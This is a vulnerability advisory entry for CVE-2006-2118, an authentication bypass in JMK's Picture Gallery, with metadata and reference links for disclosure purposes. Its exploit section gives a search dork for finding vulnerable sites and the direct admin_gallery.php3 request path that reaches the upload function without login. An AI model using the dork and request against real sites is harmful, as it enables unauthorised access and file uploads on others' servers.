JMK Picture Gallery Admin_Gallery.PHP3 Authentication Bypass Vulnerability

Vulnerability ID: 1195152   Vulnerability type: Access validation error
Published: 2006-05-01   Updated: 2006-05-02
CVE ID: CVE-2006-2118   CNNVD-ID: CNNVD-200605-022
Platform: N/A   CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006050019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-022
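|Vulnerability details
JMK's Picture Gallery allows remote attackers to bypass authentication via a direct request to admin_gallery.php3. The issue may be related to the add action.
|Exploit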
dork: "JMK's Picture Gallery"

and last path to add : admin_gallery.php3?action=add&upload=1

example: http://www.site.com/path/.../admin_gallery.php3?action=add&upload=1

credits:AlpEren,tugr@
|References

Source: BID
Name: 17755
Link: http://www.securityfocus.com/bid/17755
Source: BUGTRAQ
Name: 20060501 JMK's Picture Gallery admin login
Link: http://www.securityfocus.com/archive/1/archive/1/432575/100/0/threaded
Source: XF
Name: jmk-admingallery-unauth-access(26210)
Link: http://xforce.iss.net/xforce/xfdb/26210
Source: SREASON
Name: 821
Link: http://securityreason.com/securityalert/821